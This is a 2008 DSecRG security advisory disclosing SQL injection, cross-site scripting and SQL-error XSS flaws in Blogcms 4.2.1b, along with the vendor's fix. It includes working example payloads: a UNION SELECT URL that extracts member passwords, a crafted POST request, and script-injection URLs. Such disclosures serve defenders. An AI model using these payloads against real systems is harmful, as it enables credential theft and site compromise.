[DSECRG-08-003] blogcms 4.2.1b Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-003
Application: Blogcms
Versions Affected: Blogcms 4.2.1b
Vendor URL: http://blogcms.com/
Bugs: SQL Injestions, SiXSS, XSS
Exploits: YES
Reported: 15.01.2008
Vendor response: 16.01.2008
Date of Public Advisory: 16.01.2008
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Reasearch Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***********
Blogcms system has multiple security vulnerabilities:
1. Multiple SQL Injections
2. Multiple Linked XSS
3. Multiple Linked SiXSS
Details
*******
1. Multiple SQL Injection vulnerabilities
1.1 Attacker can inject SQL code in index.php. Parameter name "blogid"
Example:
http://[server]/[installdir]/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*
1.2 Attacker can inject SQL code in module /blogcms/action.php. POST parameter
name "user"
Example:
POST /blogcms/action.php HTTP/1.0
Cookie: DokuWiki=g8m41hncjkfjkc4sb1lvmgbiu5
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET
CLR 2.0.50727)
Host: 192.168.40.33
Pragma: no-cache
Connection: Keep-Alive
action=addcomment&url=http%3A%2F%2F192.168.40.33%2Fblogcms%2F%3Fitem%3Dblog-cms-4-2-1&itemid=1&body=asd&&userid=asd&x=42&y=13&user=asd'+[DSecRG_INJECTION]
-------------------------------------------------------------------------------
2. Multiple Linked XSS vulnerabilities
Linked XSS vulnerability found in /photo/admin.php and /photo/index.php
attacker can inject XSS script in URL
Example:
http://[server]/[installdir]/photo/admin.php/"><script>alert('DSECRG_XSS')</script>
http://[server]/[installdir]/photo/index.php/"><script>alert('DSECRG_XSS')</script>
-------------------------------------------------------------------------------
3. Multiple SiXSS (XSS throught SQl Injection Error) vulnerabilities
3.1 Linked SiXSS vulnerability found in index.php, attacker can inject XSS code
in SQL Error
Example:
http://[server]/[installdir]/index.php?query=asd&amount=0&blogid=1'<script>alert('DSecRG_XSS')</script>;&x=34&y=6
3.1 Linked SiXSS vulnerability found in /admin/plugins/table/index.php,
attacker can inject XSS code in SQL Error
It is also a SQL injection but because it is in admin panel it is not critical.
Example:
http://[server]/[installdir]/admin/plugins/table/index.php?action=edittemplate&field=title'<script>a=/DSecRG
XSS/%0d%0aalert(a.source)</script>&id=2&text=0
-------------------------------------------------------------------------------
Fix Information
***************
Blogcms was altered to fix this flaw on 16.01.2008. Updated version (4.2.1.c)
can be downloaded here:
http://blogcms.com/?item=download
Changelog: http://blogcms.com/wiki/changelog
About
*****
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)